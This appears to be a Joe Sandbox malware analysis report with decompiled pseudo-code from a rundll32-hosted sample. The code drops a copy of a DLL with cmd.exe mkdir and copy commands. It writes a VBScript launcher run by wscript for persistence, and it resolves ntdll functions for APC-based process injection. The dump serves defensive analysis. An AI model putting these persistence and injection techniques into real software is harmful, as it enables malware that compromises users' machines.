				goto 0xc8058566;
				_t328 =  >=  ?  *((void*)(_t434 + 0x68)) : _t434 + 0x68;
				_t184 = GetFileAttributesA(??);
				if (_t184 == 0xffffffff) goto 0xc8058097;
				if ((_t184 & 0x00000010) == 0) goto 0xc8058097;
				goto 0xc8058566;
				 *((long long*)(_t432 + 0x20)) = __r12;
				 *((long long*)(_t432 + 0x28)) = __r12;
				 *((long long*)(_t432 + 0x28)) = 0xf;
				 *((long long*)(_t432 + 0x20)) = __r12;
				 *((char*)(_t432 + 0x10)) = 0;
				r8d = 7;
				E00000285285C8056B10(_t314, _t432 + 0x10, "\"mkdir ", _t430, _t430);
				_t461 = _t460 | 0xffffffff;
				r8d = r8d ^ r8d;
				E00000285285C8058D60(_t314, _t432 + 0x10, _t425, _t425, _t430, _t432, _t430, _t460 | 0xffffffff);
				r8d = 1;
				E00000285285C8058C10(_t314, _t432 + 0x10, "\"", _t425, _t432, _t430);
				_t188 = E00000285285C80593D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 + 0x10, _t460 | 0xffffffff);
				if ( *((long long*)(_t302 + 0x18)) - 0x10 < 0) goto 0xc8058111;
				_t189 = E00000285285C809B510(_t188, _t252, _t314,  *_t302, "cmd.exe /c ");
				E00000285285C8056820(_t189, 0, _t434 + 0x48);
				if (_t189 == 0) goto 0xc8058130;
				0xc8057e80();
				E00000285285C8059490(_t314, _t434 + 0x48, _t434 + 0x68, _t430, _t432, "\\", _t461);
				E00000285285C8056820(E00000285285C80595D0(_t432 + 0x88,  *_t302, _t425, _t430, _t432, _t475, _t461), _t189, _t434 + 0x48);
				r8d = 4;
				E00000285285C8058C10(_t314, _t432 + 0x88, ".dll", _t425, _t432, _t475);
				 *((long long*)(_t432 + 0x58)) = __r12;
				 *((long long*)(_t432 + 0x60)) = __r12;
				 *((long long*)(_t432 + 0x60)) = 0xf;
				 *((long long*)(_t432 + 0x58)) = __r12;
				 *((char*)(_t432 + 0x48)) = 0;
				if ( *((long long*)(_t474 + 0x10)) != 0) goto 0xc80581c7;
				r8d = 0x208;
				E00000285285C80C8EF0(_t189, 0, 1, _t254, _t432 + 0x2b0, ".dll", _t425, _t475);
				r8d = 0x208;
				GetModuleFileNameA(??, ??, ??);
				goto 0xc80581e3;
				_t304 = _t432 + 0x48;
				if (_t304 == _t474) goto 0xc80581e3;
				r8d = 0;
				E00000285285C8056C40(_t314, _t432 + 0x48, _t474, _t425, _t430, _t475, _t461 | 0xffffffff);
				 *((long long*)(_t432 - 0x20)) = __r12;
				 *((long long*)(_t432 - 0x18)) = __r12;
				 *((long long*)(_t432 - 0x18)) = 0xf;
				 *((long long*)(_t432 - 0x20)) = __r12;
				 *((char*)(_t432 - 0x30)) = 0;
				r8d = 6;
				E00000285285C8056B10(_t314, _t432 - 0x30, "\"copy ", _t430, _t475);
				r8d = r8d ^ r8d;
				E00000285285C8058D60(_t314, _t432 - 0x30, _t432 + 0x48, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
				E00000285285C8058C10(_t314, _t432 - 0x30, " ", _t425, _t432, _t425);
				r8d = 0;
				E00000285285C8058D60(_t314, _t432 - 0x30, _t432 + 0x88, _t425, _t430, _t432, _t425, _t461 | 0xffffffffffffffff);
				E00000285285C8058C10(_t314, _t432 - 0x30, "\"", _t425, _t432, _t425);
				_t203 = E00000285285C80593D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 - 0x30, _t461 | 0xffffffffffffffff);
				if ( *((long long*)(_t304 + 0x18)) - 0x10 < 0) goto 0xc8058283;
				_t305 =  *_t304;
				_t250 = E00000285285C809B510(_t203, _t189, _t314, _t305, "cmd.exe /c ");
				E00000285285C8056820(_t204, 0, _t434 + 0x48);
				if (_t250 == 0) goto 0xc80582a2;
				_t241 = _t250;
				0xc8057e80();
				r8d = 0x200;
				E00000285285C80C8EF0(_t241, 0, _t250, _t254, _t432 + 0xb0, "cmd.exe /c ", _t425, _t432 - 0x30);
				 *((intOrPtr*)(_t432 - 0x58)) = 0x100;
				GetUserNameW(??, ??);
				E00000285285C8059490(_t314, _t432 + 0x68, _t434 + 0x68, _t430, _t432, "\\", _t461 | 0xffffffffffffffff);
				E00000285285C80595D0(_t432 - 0x78, _t305, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
				E00000285285C8056820(E00000285285C8056820(E00000285285C8059550(_t432 - 0x10, _t305, _t425, _t432, ".mbx"), _t241, _t432 - 0x78), _t241, _t432 + 0x68);
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((long long*)(_t434 + 0x60)) = __r12;
				 *((long long*)(_t434 + 0x60)) = 7;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
				r8d = 0xb;
				E00000285285C8058AC0(_t314, _t434 + 0x48, L"wscript.exe", _t430, ".mbx");
				E00000285285C80593D0(_t314, _t432 + 0x68, "/E:vbscript ", _t430, _t432, _t432 - 0x10, _t461 | 0xffffffffffffffff);
				if ( *((long long*)(_t305 + 0x18)) - 0x10 < 0) goto 0xc8058370;
				_t306 =  *_t305;
				 *((long long*)(_t434 + 0x30)) = _t434 + 0x48;
				E00000285285C8056820(E00000285285C8096780(_t237, _t241, _t189, _t314, "/E:vbscript ", _t425, _t430, _t432 + 0xb0, _t306, _t469, _t474), _t241, _t432 + 0x68);
				if ( *((intOrPtr*)(_t434 + 0x60)) - 8 < 0) goto 0xc80583b1;
				E00000285285C8058F90(0, _t314,  *((intOrPtr*)(_t434 + 0x48)), _t425, _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1, _t306);
				 *((long long*)(_t434 + 0x60)) = 7;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
				 *(_t432 - 0x40) = __r12;
				 *((long long*)(_t432 - 0x38)) = __r12;
				 *((long long*)(_t432 - 0x38)) = 0xf;
				 *(_t432 - 0x40) = __r12;
				 *((char*)(_t432 - 0x50)) = 0;
				r8d = 0x6b;
				E00000285285C8056B10(_t314, _t432 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, LLBMPMUsqf\"\r\n", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
				 *((long long*)(_t432 - 0x68)) = __r12;
				 *((long long*)(_t432 - 0x60)) = __r12;
				 *((long long*)(_t432 - 0x60)) = 0xf;
				 *((long long*)(_t432 - 0x68)) = __r12;
				 *((char*)(_t432 - 0x78)) = 0;
				r8d = 0x13;
				_t219 = E00000285285C8056B10(_t314, _t432 - 0x78, "my_application_path", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
				_t416 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
				r8d = 0;
				E00000285285C8056A20(_t219, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t434 + 0x60)) + 1,  *((intOrPtr*)(_t432 - 0x68)));
				if (_t306 == 0xffffffff) goto 0xc805849d;
				asm("o16 nop [eax+eax]");
				 *((long long*)(_t434 + 0x28)) = 0xffffffff;
				 *((long long*)(_t434 + 0x20)) = __r12;
				_t221 = E00000285285C8059920(_t432 - 0x50, _t306, _t306,  *((intOrPtr*)(_t432 - 0x68)), _t432 + 0x88, __r12, _t473, _t475);
				_t419 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
				_t222 = E00000285285C8056A20(_t221, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t432 - 0x68)) + _t306,  *((intOrPtr*)(_t432 - 0x68)));
				if (_t306 != 0xffffffff) goto 0xc8058450;
				E00000285285C8056820(_t222, _t241, _t432 - 0x78);
				_t421 =  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50;
				_t368 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
				r8d =  *(_t432 - 0x40);
				E00000285285C809A9C8(_t306, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10,  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50, _t430,  *((intOrPtr*)(_t432 - 0x68)));
				E00000285285C80593D0(_t314, _t432 + 0x68, "wscript.exe /E:vbscript ", _t430, _t432, _t432 - 0x10,  *((intOrPtr*)(_t432 - 0x68)));
				E00000285285C8056820(E00000285285C8058900(_t241, _t314, _t432 - 0x10, _t306), _t241, _t432 + 0x68);
				_t372 =  *0xc81532c8; // 0x0
				if (_t372 == 0) goto 0xc805850f;
				_t228 = CloseHandle(??);
				 *0xc81532c8 = _t471;
				_t374 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
				E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C809B510(_t228, _t189, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10, _t306), _t241, _t432 - 0x50), _t241, _t432 - 0x10), _t241, _t432 - 0x30), _t241, _t432 + 0x48), _t241, _t432 + 0x88), _t241, _t432 + 0x10);
				_t307 =  *((intOrPtr*)(_t432 - 0x80));
				if (_t307 - 0x10 < 0) goto 0xc80585bd;
				_t381 =  *((intOrPtr*)(_t434 + 0x68));
				if (_t307 + 1 - 0x1000 < 0) goto 0xc80585b8;
				if ((_t241 & 0x0000001f) == 0) goto 0xc805858b;
				0xc80caadc();
				asm("int3");
				_t309 =  *((intOrPtr*)(_t381 - 8));
				if (_t309 - _t381 < 0) goto 0xc805859a;
				0xc80caadc();
				asm("int3");
				_t382 = _t381 - _t309;
				if (_t382 - 8 >= 0) goto 0xc80585a9;
				0xc80caadc();
				asm("int3");
				if (_t382 - 0x27 <= 0) goto 0xc80585b5;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				 *((long long*)(_t432 - 0x80)) = 0xf;
				 *(_t434 + 0x78) = _t471;
				 *((char*)(_t434 + 0x68)) = 0;
				if (_t314 == 0) goto 0xc805862f;
				if ( *(_t432 + 0x40) - _t314 - 0x1000 < 0) goto 0xc805861b;
				if ((_t237 & 0x0000001f) == 0) goto 0xc80585ee;
				0xc80caadc();
				asm("int3");
				_t312 =  *((intOrPtr*)(_t314 - 8));
				if (_t312 - _t314 < 0) goto 0xc80585fd;
				0xc80caadc();
				asm("int3");
				_t315 = _t314 - _t312;
				if (_t315 - 8 >= 0) goto 0xc805860c;
				0xc80caadc();
				asm("int3");
				if (_t315 - 0x27 <= 0) goto 0xc8058618;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x30], xmm0");
				 *(_t432 + 0x40) = _t471;
				return 3;
			}



















































                0x285c8057ed0
                0x285c8057ed0
                0x285c8057ed0
                0x285c8057ed0
                0x285c8057ed8
                0x285c8057edf
                0x285c8057ee6
                0x285c8057ef1
                0x285c8057ef5
                0x285c8057ef9
                0x285c8057efd
                0x285c8057f01
                0x285c8057f04
                0x285c8057f07
                0x285c8057f0a
                0x285c8057f0d
                0x285c8057f10
                0x285c8057f15
                0x285c8057f18
                0x285c8057f1c
                0x285c8057f2a
                0x285c8057f2f
                0x285c8057f32
                0x285c8057f32
                0x285c8057f37
                0x285c8057f40
                0x285c8057f48
                0x285c8057f4d
                0x285c8057f52
                0x285c8057f57
                0x285c8057f5b
                0x285c8057f63
                0x285c8057f68
                0x285c8057f70
                0x285c8057f75
                0x285c8057f88
                0x285c8057f92
                0x285c8057f9e
                0x285c8057fa5
                0x285c8057fb9
                0x285c8057fbf
                0x285c8057fc3
                0x285c8057fce
                0x285c8057fd4
                0x285c8057fdd
                0x285c8057fe2
                0x285c8057fed
                0x285c8057ff2
                0x285c8057ff4
                0x285c8057ff9
                0x285c8057ffa
                0x285c8058001
                0x285c8058003
                0x285c8058008
                0x285c8058009
                0x285c8058010
                0x285c8058012
                0x285c8058017
                0x285c805801c
                0x285c805801e
                0x285c8058023
                0x285c8058027
                0x285c805802c
                0x285c8058035
                0x285c805803a
                0x285c805803f
                0x285c8058047
                0x285c8058049
                0x285c805804d
                0x285c8058058
                0x285c8058064
                0x285c805806b
                0x285c805807a
                0x285c8058080
                0x285c8058089
                0x285c805808d
                0x285c8058092
                0x285c8058097
                0x285c805809b
                0x285c805809f
                0x285c80580a7
                0x285c80580ab
                0x285c80580af
                0x285c80580c0
                0x285c80580c6
                0x285c80580ca
                0x285c80580d4
                0x285c80580de
                0x285c80580ec
                0x285c8058101
                0x285c805810c
                0x285c8058114
                0x285c8058120
                0x285c8058127
                0x285c805812b
                0x285c8058141
                0x285c805815f
                0x285c8058164
                0x285c8058178
                0x285c805817d
                0x285c8058181
                0x285c8058185
                0x285c805818d
                0x285c8058191
                0x285c805819a
                0x285c805819e
                0x285c80581ab
                0x285c80581b0
                0x285c80581bf
                0x285c80581c5
                0x285c80581c7
                0x285c80581ce
                0x285c80581d4
                0x285c80581de
                0x285c80581e3
                0x285c80581e7
                0x285c80581eb
                0x285c80581f3
                0x285c80581f7
                0x285c80581fb
                0x285c805820c
                0x285c8058216
                0x285c8058221
                0x285c8058234
                0x285c805823d
                0x285c805824b
                0x285c805825e
                0x285c8058273
                0x285c805827e
                0x285c8058280
                0x285c805828b
                0x285c8058292
                0x285c8058299
                0x285c805829b
                0x285c805829d
                0x285c80582a4
                0x285c80582b1
                0x285c80582b6
                0x285c80582c8
                0x285c80582de
                0x285c80582ee
                0x285c8058316
                0x285c805831b
                0x285c8058320
                0x285c8058325
                0x285c805832e
                0x285c8058333
                0x285c8058339
                0x285c805834b
                0x285c8058360
                0x285c805836b
                0x285c805836d
                0x285c8058375
                0x285c805838e
                0x285c805839d
                0x285c80583ac
                0x285c80583b1
                0x285c80583ba
                0x285c80583bf
                0x285c80583c5
                0x285c80583c9
                0x285c80583cd
                0x285c80583d5
                0x285c80583d9
                0x285c80583dd
                0x285c80583ee
                0x285c80583f4
                0x285c80583f8
                0x285c80583fc
                0x285c8058404
                0x285c8058408
                0x285c805840c
                0x285c805841d
                0x285c805842c
                0x285c8058435
                0x285c805843c
                0x285c8058448
                0x285c805844a
                0x285c8058450
                0x285c8058459
                0x285c8058470
                0x285c805847e
                0x285c805848f
                0x285c805849b
                0x285c80584a1
                0x285c80584af
                0x285c80584bd
                0x285c80584c2
                0x285c80584c6
                0x285c80584da
                0x285c80584f1
                0x285c80584f6
                0x285c8058500
                0x285c8058502
                0x285c8058508
                0x285c8058518
                0x285c8058560
                0x285c8058566
                0x285c805856e
                0x285c8058573
                0x285c805857e
                0x285c8058583
                0x285c8058585
                0x285c805858a
                0x285c805858b
                0x285c8058592
                0x285c8058594
                0x285c8058599
                0x285c805859a
                0x285c80585a1
                0x285c80585a3
                0x285c80585a8
                0x285c80585ad
                0x285c80585af
                0x285c80585b4
                0x285c80585b8
                0x285c80585bd
                0x285c80585c5
                0x285c80585ca
                0x285c80585d2
                0x285c80585e1
                0x285c80585e6
                0x285c80585e8
                0x285c80585ed
                0x285c80585ee
                0x285c80585f5
                0x285c80585f7
                0x285c80585fc
                0x285c80585fd
                0x285c8058604
                0x285c8058606
                0x285c805860b
                0x285c8058610
                0x285c8058612
                0x285c8058617
                0x285c805861e
                0x285c8058623
                0x285c8058626
                0x285c805862b
                0x285c8058651

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FolderPathSpecial
                • String ID: "copy $"mkdir $.dll$.mbx$/E:vbscript $Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, LLBMPMUsqf"$cmd.exe /c $my_application_path$wscript.exe$wscript.exe /E:vbscript
                • API String ID: 994120019-2262109626
                • Opcode ID: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction ID: ec4a595de92964548ab8055c113b09bc544b13e598a821132d5af4fff7ab1624
                • Opcode Fuzzy Hash: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction Fuzzy Hash: 0422D03A212F60D5FB10DB64D8587DD27A1F7413A8F908613EE6923AEADF38C548CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80E3DE8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 366timeCOMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 95%
                			E00000285285C80E3DE8(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed int _a16, signed int _a24) {
				void* __rdi;
				void* __rsi;
				void* _t26;
				signed char _t36;
				signed int _t38;
				void* _t40;
				signed int _t43;
				void* _t45;
				void* _t46;
				signed int _t60;
				signed char* _t67;
				void* _t75;
				intOrPtr* _t90;
				signed char* _t92;
				signed int* _t93;
				signed char* _t96;
				signed char* _t97;
				signed char* _t98;
				signed char* _t99;
				signed char* _t100;
				signed char* _t101;
				signed char* _t102;
				signed char* _t107;
				signed char* _t111;
				signed long long _t118;
				signed long long _t119;
				intOrPtr* _t122;
				void* _t134;

				_t90 = __rax;
				_a8 = __rbx;
				E00000285285C80E3D50(_t26);
				r14d = 0;
				_a16 = r14d;
				_t122 = _t90;
				_a24 = r14d;
				if (E00000285285C80E3DB8(__edx, _t90,  &_a16) != 0) goto 0xc80e4021;
				if (E00000285285C80E3D58(__edx, _t90,  &_a24) != 0) goto 0xc80e400c;
				_t107 =  *0xc8152f98; // 0x0
				_t67 = _t107;
				if (_t67 == 0) goto 0xc80e3e65;
				r9d = __rcx[_t107 - __rcx] & 0x000000ff;
				if (_t67 != 0) goto 0xc80e3e5d;
				_t92 =  &(__rcx[1]);
				if (r9d != 0) goto 0xc80e3e48;
				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0xc80e3fbc;
				E00000285285C80DA780(_t92, _t107);
				_t119 = _t118 | 0xffffffff;
				if (__rcx[_t119 + 1] != r14b) goto 0xc80e3e71;
				E00000285285C80D3D7C(_t92, _t119 + 2);
				 *0xc8152f98 = _t92;
				E00000285285C80DA780(_t92, _t119 + 2);
				_t111 =  *0xc8152f98; // 0x0
				if (_t111 == 0) goto 0xc80e3fbc;
				_t120 = _t119 + 1;
				if (__rcx[_t119 + 1] != r14b) goto 0xc80e3ea0;
				if (E00000285285C80DBDB0(( *__rcx & 0x000000ff) - r9d, _t92, _t111, _t119 + 2, __rcx) != 0) goto 0xc80e3ff7;
				_t10 =  &(_t92[3]); // 0x3
				r13d = _t10;
				r9d = r13d;
				_t11 =  &(_t92[0x40]); // 0x40
				if (E00000285285C80DE758(_t11, _t92, __rcx,  *_t122, _t119 + 2, __r9) != 0) goto 0xc80e3fe2;
				_t75 =  *__rcx - r14b;
				if (_t75 == 0) goto 0xc80e3eeb;
				_t96 =  &(__rcx[1]);
				if (_t75 != 0) goto 0xc80e3edd;
				dil =  *_t96 == 0x2d;
				if (dil == 0) goto 0xc80e3efa;
				_t97 =  &(_t96[1]);
				_a16 = E00000285285C80DBE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10;
				_t36 =  *_t97;
				if (_t36 == 0x2b) goto 0xc80e3f17;
				if (_t36 - 0x30 - 9 > 0) goto 0xc80e3f1c;
				_t98 =  &(_t97[1]);
				goto 0xc80e3f0b;
				if ( *_t98 != 0x3a) goto 0xc80e3f6d;
				_t99 =  &(_t98[1]);
				_t38 = E00000285285C80DBE3C(E00000285285C80DBE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10, _t92, _t99, _t99, _t120 - 1, _t122, __r9);
				_a16 = _a16 + _t38 * 0x3c;
				goto 0xc80e3f40;
				if (_t38 - 0x39 > 0) goto 0xc80e3f46;
				_t100 =  &(_t99[1]);
				if ( *_t100 - 0x30 >= 0) goto 0xc80e3f39;
				if ( *_t100 != 0x3a) goto 0xc80e3f6d;
				_t101 =  &(_t100[1]);
				_t40 = E00000285285C80DBE3C(_a16 + _t38 * 0x3c, _t92, _t101, _t101, _t120 - 1, _t122, __r9);
				_t60 = _a16 + _t40;
				_a16 = _t60;
				goto 0xc80e3f67;
				if (_t40 - 0x39 > 0) goto 0xc80e3f6d;
				_t102 =  &(_t101[1]);
				if ( *_t102 - 0x30 >= 0) goto 0xc80e3f60;
				if (dil == 0) goto 0xc80e3f77;
				_a16 =  ~_t60;
				_t43 = r14d & 0xffffff00 |  *_t102 != r14b;
				_a24 = _t43;
				if (_t43 == 0) goto 0xc80e3fa1;
				if (E00000285285C80DE758(0x40, _t92, _t102,  *((intOrPtr*)(_t122 + 8)), _t119 + 2, _t134) == 0) goto 0xc80e3fa8;
				goto 0xc80e3fcd;
				_t93 =  *((intOrPtr*)(_t122 + 8));
				 *_t93 = r14b;
				_t45 = E00000285285C80E3D48(_t44);
				 *_t93 = _a16;
				_t46 = E00000285285C80E3D38(_t45);
				 *_t93 = _a24;
				return _t46;
			}































                0x285c80e3de8
                0x285c80e3de8
                0x285c80e3dfe
                0x285c80e3e03
                0x285c80e3e0a
                0x285c80e3e0e
                0x285c80e3e11
                0x285c80e3e1c
                0x285c80e3e2d
                0x285c80e3e33
                0x285c80e3e3a
                0x285c80e3e3d
                0x285c80e3e4b
                0x285c80e3e53
                0x285c80e3e55
                0x285c80e3e5b
                0x285c80e3e5f
                0x285c80e3e65
                0x285c80e3e6a
                0x285c80e3e78
                0x285c80e3e7d
                0x285c80e3e84
                0x285c80e3e8b
                0x285c80e3e90
                0x285c80e3e9a
                0x285c80e3ea0
                0x285c80e3ea7
                0x285c80e3eb7
                0x285c80e3ec0
                0x285c80e3ec0
                0x285c80e3ec4
                0x285c80e3ec7
                0x285c80e3ed7
                0x285c80e3edd
                0x285c80e3ee0
                0x285c80e3ee2
                0x285c80e3ee9
                0x285c80e3eee
                0x285c80e3ef5
                0x285c80e3ef7
                0x285c80e3f08
                0x285c80e3f0b
                0x285c80e3f0f
                0x285c80e3f15
                0x285c80e3f17
                0x285c80e3f1a
                0x285c80e3f1f
                0x285c80e3f21
                0x285c80e3f27
                0x285c80e3f34
                0x285c80e3f37
                0x285c80e3f3b
                0x285c80e3f3d
                0x285c80e3f44
                0x285c80e3f49
                0x285c80e3f4b
                0x285c80e3f51
                0x285c80e3f59
                0x285c80e3f5b
                0x285c80e3f5e
                0x285c80e3f62
                0x285c80e3f64
                0x285c80e3f6b
                0x285c80e3f70
                0x285c80e3f74
                0x285c80e3f7d
                0x285c80e3f80
                0x285c80e3f85
                0x285c80e3f9d
                0x285c80e3f9f
                0x285c80e3fa1
                0x285c80e3fa5
                0x285c80e3fab
                0x285c80e3fb0
                0x285c80e3fb5
                0x285c80e3fba
                0x285c80e3fcc

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: ?
                • API String ID: 3440502458-1684325040
                • Opcode ID: dc1927210b812cc2526de8ced73877b5a23a1320a393b12373780dc02b73dedc
                • Instruction ID: 98f59d837a444bfe17ad1be08f6f3f47c3575d5353fdd977a45146df76e1b591
                • Opcode Fuzzy Hash: dc1927210b812cc2526de8ced73877b5a23a1320a393b12373780dc02b73dedc
                • Instruction Fuzzy Hash: 8EE1F73A212FA08AF7649F35A84979B7BA1F785784F44D12BEA8957B95CF3CC4418F00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8057AE0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 108libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00000285285C8057AE0(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
				long long _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t35;
				void* _t49;
				void* _t50;
				void* _t51;
				long long* _t60;
				void* _t94;
				void* _t103;

				_t94 = __rdx;
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xc8057aff;
				goto 0xc8057b02;
				_t103 = __r8;
				r15d =  *((intOrPtr*)(__r8 + 0x10));
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *__rax();
				 *__rax();
				if (__rcx == 0) goto 0xc8057c94;
				_v56 = __r13;
				r13d = 0;
				_a8 = __r13;
				_a32 = __r13;
				_v72 = __r13;
				if (E00000285285C809AB8C(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0xc8057c2c;
				_v64 = __r13;
				_a24 = __r13;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v80 = 0x40;
				_v88 = r13d;
				_v96 = 2;
				r9d = 0;
				_v104 =  &_v64;
				_t60 =  &_a24;
				_v112 = _t60;
				_v120 = __r13;
				_t35 =  *__rax();
				if ( *__rax() != 0) goto 0xc8057c2c;
				r8d = r15d;
				E00000285285C80C7310(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
				if (_t94 == 0) goto 0xc8057c6f;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				r9d = 0;
				_v120 = r13d;
				r8d = 0;
				 *_t60();
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				return 1;
			}






















                0x285c8057af2
                0x285c8057af8
                0x285c8057afd
                0x285c8057aff
                0x285c8057b02
                0x285c8057b0d
                0x285c8057b20
                0x285c8057b33
                0x285c8057b3c
                0x285c8057b40
                0x285c8057b45
                0x285c8057b4b
                0x285c8057b58
                0x285c8057b66
                0x285c8057b6e
                0x285c8057b76
                0x285c8057b82
                0x285c8057b8f
                0x285c8057b94
                0x285c8057b9c
                0x285c8057baf
                0x285c8057bc2
                0x285c8057bd5
                0x285c8057be0
                0x285c8057bea
                0x285c8057bf2
                0x285c8057bf5
                0x285c8057bfd
                0x285c8057c05
                0x285c8057c0a
                0x285c8057c0f
                0x285c8057c17
                0x285c8057c21
                0x285c8057c27
                0x285c8057c2f
                0x285c8057c38
                0x285c8057c4d
                0x285c8057c53
                0x285c8057c56
                0x285c8057c5b
                0x285c8057c64
                0x285c8057c69
                0x285c8057c77
                0x285c8057c80
                0x285c8057c89
                0x285c8057ca2

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Handle$AddressProc$Close$Module
                • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 2187694145-438560624
                • Opcode ID: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction ID: c77e6d0686818c95406620c140f164c27b7742d6b0afd73a34da44d5bdc02796
                • Opcode Fuzzy Hash: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction Fuzzy Hash: 1A413B7E206F9096EA60DB51F85879A73A0FB8ABD5F448026DE4D13754DF7CC149CB01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8099E18 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 190COMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00000285285C8099E18(long long __rbx, void* __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, void* _a16, long long _a24, intOrPtr _a40) {
				long long _v64;
				void* _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				signed int _v120;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t65;
				intOrPtr _t69;
				char _t70;
				void* _t71;
				intOrPtr _t93;
				void* _t95;
				void* _t106;
				long long _t112;
				signed long long _t115;
				long long* _t119;
				long long _t120;
				intOrPtr* _t128;
				void* _t148;
				long long _t154;
				long long _t157;
				intOrPtr _t158;
				void* _t160;
				long long _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t179;

				_t170 = __r9;
				_t120 = __rbx;
				_a8 = __rbx;
				_a24 = __r8;
				_a16 = __rdx;
				_t112 =  *((intOrPtr*)(__rcx + 8));
				_v96 = __rdx;
				_t179 = __rcx;
				_t172 = __r9;
				_a16 = __rdx;
				_v104 = __rdx;
				r12d =  *((intOrPtr*)(__rcx + 0x24));
				_v72 = __rdx;
				_v80 = __rdx;
				_v88 = __rdx;
				_v64 = _t112;
				_a40 =  *((intOrPtr*)(__rcx + 0x14));
				if (_t112 != 0) goto 0xc8099e7c;
				goto 0xc809a0b6;
				_t113 =  *0xc8144e7c;
				r14d =  *( *0xc8144e7c + "is program cannot be run in DOS mode.\r\r\n$");
				r14d = r14d + 0xfff;
				r14d = r14d & 0xfffff000;
				if (E00000285285C809AB8C(_t173 + 0x2578,  *0xc8144e7c, __rbx,  &_v96, _t154, _t157,  &_v80) != 0) goto 0xc809a069;
